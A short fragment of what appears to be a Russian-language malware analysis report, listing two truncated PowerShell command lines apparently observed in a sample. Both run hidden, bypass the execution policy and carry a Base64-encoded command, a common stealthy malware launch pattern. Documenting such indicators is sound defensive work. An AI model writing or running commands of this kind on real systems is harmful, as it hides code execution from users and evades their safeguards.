Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -executionpolicy bypass -e ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUw...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -executionpolicy bypass -e ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUw...' (со скрытым окном)